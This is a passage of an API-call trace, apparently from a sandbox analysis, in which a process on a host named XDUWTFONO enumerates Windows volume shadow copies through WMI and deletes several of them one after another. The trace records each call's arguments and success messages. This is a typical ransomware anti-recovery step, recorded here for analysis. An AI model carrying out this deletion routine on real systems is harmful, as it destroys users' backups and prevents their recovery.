_File=0x7fefdf72ab0) returned 0 [0222.307] free (_Block=0x37dca0) [0222.307] free (_Block=0x37d490) [0222.307] LocalFree (hMem=0x15b790) returned 0x0 [0222.307] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0223.869] IUnknown:Release (This=0x1d03d80) returned 0x0 [0223.870] malloc (_Size=0x800) returned 0x37d490 [0223.870] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0223.870] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0223.870] malloc (_Size=0x20) returned 0x37dca0 [0223.870] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0223.870] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0223.870] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0223.870] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0223.870] free (_Block=0x37dca0) [0223.870] free (_Block=0x37d490) [0223.870] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0223.872] malloc (_Size=0x18) returned 0x37bfb0 [0223.872] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0223.872] free (_Block=0x37bfb0) [0223.872] malloc (_Size=0x800) returned 0x37d490 [0223.872] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0223.872] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0223.872] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0223.872] malloc (_Size=0x68) returned 0x37dca0 [0223.872] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0223.872] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0223.872] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0223.872] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0223.872] free (_Block=0x37dca0) [0223.872] free (_Block=0x37d490) [0223.872] LocalFree (hMem=0x15b790) returned 0x0 [0223.872] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0225.369] IUnknown:Release (This=0x1d03d80) returned 0x0 [0225.369] malloc (_Size=0x800) returned 0x37d490 [0225.369] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0225.369] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0225.369] malloc (_Size=0x20) returned 0x37dca0 [0225.369] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0225.369] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0225.369] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0225.369] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0225.369] free (_Block=0x37dca0) [0225.369] free (_Block=0x37d490) [0225.369] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0225.371] malloc (_Size=0x18) returned 0x37bfb0 [0225.371] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0225.371] free (_Block=0x37bfb0) [0225.371] malloc (_Size=0x800) returned 0x37d490 [0225.371] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0225.371] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0225.371] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0225.371] malloc (_Size=0x68) returned 0x27ee90 [0225.371] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x27ee90, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0225.371] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0225.371] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0225.371] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0225.371] free (_Block=0x27ee90) [0225.371] free (_Block=0x37d490) [0225.371] LocalFree (hMem=0x15b790) returned 0x0 [0225.371] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0227.506] IUnknown:Release (This=0x1d03d80) returned 0x0 [0227.506] malloc (_Size=0x800) returned 0x37d490 [0227.506] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0227.506] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0227.506] malloc (_Size=0x20) returned 0x37dca0 [0227.506] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0227.506] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0227.506] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0227.506] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0227.506] free (_Block=0x37dca0) [0227.506] free (_Block=0x37d490) [0227.506] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0227.509] malloc (_Size=0x18) returned 0x37bfb0 [0227.509] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0227.510] free (_Block=0x37bfb0) [0227.510] malloc (_Size=0x800) returned 0x37d490 [0227.510] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0227.510] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0227.510] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0227.510] malloc (_Size=0x68) returned 0x37dca0 [0227.510] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0227.510] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0227.510] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0227.510] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0227.510] free (_Block=0x37dca0) [0227.510] free (_Block=0x37d490) [0227.510] LocalFree (hMem=0x15b790) returned 0x0 [0227.510] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0229.365] IUnknown:Release (This=0x1d03d80) returned 0x0 [0229.365] malloc (_Size=0x800) returned 0x37d490 [0229.365] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0229.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0229.365] malloc (_Size=0x20) returned 0x37feb0 [0229.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37feb0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0229.365] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0229.366] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0229.366] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0229.366] free (_Block=0x37feb0) [0229.366] free (_Block=0x37d490) [0229.366] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0229.367] malloc (_Size=0x18) returned 0x37bfb0 [0229.367] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0229.367] free (_Block=0x37bfb0) [0229.367] malloc (_Size=0x800) returned 0x37d490 [0229.367] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0229.367] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="ᇐ\x15") returned 0x67 [0229.367] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0229.367] malloc (_Size=0x68) returned 0x37dca0 [0229.367] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0229.368] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0229.368] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0229.368] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0229.368] free (_Block=0x37dca0) [0229.368] free (_Block=0x37d490) [0229.368] LocalFree (hMem=0x1511d0) returned 0x0 [0229.368] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0230.722] IUnknown:Release (This=0x1d03d80) returned 0x0 [0230.722] malloc (_Size=0x800) returned 0x37d490 [0230.722] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0230.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0230.722] malloc (_Size=0x20) returned 0x37dca0 [0230.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0230.722] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0230.722] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0230.722] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0230.722] free (_Block=0x37dca0) [0230.722] free (_Block=0x37d490) [0230.722] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0230.724] malloc (_Size=0x18) returned 0x37bfb0 [0230.724] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0230.724] free (_Block=0x37bfb0) [0230.724] malloc (_Size=0x800) returned 0x37d490 [0230.725] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0230.725] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0230.725] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0230.725] malloc (_Size=0x68) returned 0x37dca0 [0230.725] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0230.725] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0230.725] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0230.725] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0230.725] free (_Block=0x37dca0) [0230.725] free (_Block=0x37d490) [0230.725] LocalFree (hMem=0x15c7e0) returned 0x0 [0230.725] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0231.737] IUnknown:Release (This=0x1d03d80) returned 0x0 [0231.737] malloc (_Size=0x800) returned 0x37d490 [0231.737] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0231.737] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0231.737] malloc (_Size=0x20) returned 0x37dca0 [0231.737] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0231.737] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0231.891] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0231.899] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0231.899] free (_Block=0x37dca0) [0231.899] free (_Block=0x37d490) [0231.899] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0231.900] malloc (_Size=0x18) returned 0x37bfb0 [0232.016] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0232.016] free (_Block=0x37bfb0) [0232.016] malloc (_Size=0x800) returned 0x37d490 [0232.016] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0232.016] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0232.016] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0232.016] malloc (_Size=0x68) returned 0x37dca0 [0232.016] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0232.017] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0232.017] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0232.017] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0232.017] free (_Block=0x37dca0) [0232.017] free (_Block=0x37d490) [0232.017] LocalFree (hMem=0x15c7e0) returned 0x0 [0232.017] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0234.543] IUnknown:Release (This=0x1d03d80) returned 0x0 [0234.543] malloc (_Size=0x800) returned 0x37d490 [0234.544] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0234.544] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0234.544] malloc (_Size=0x20) returned 0x37dca0 [0234.544] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0234.544] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0234.544] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0234.544] fflush (in: 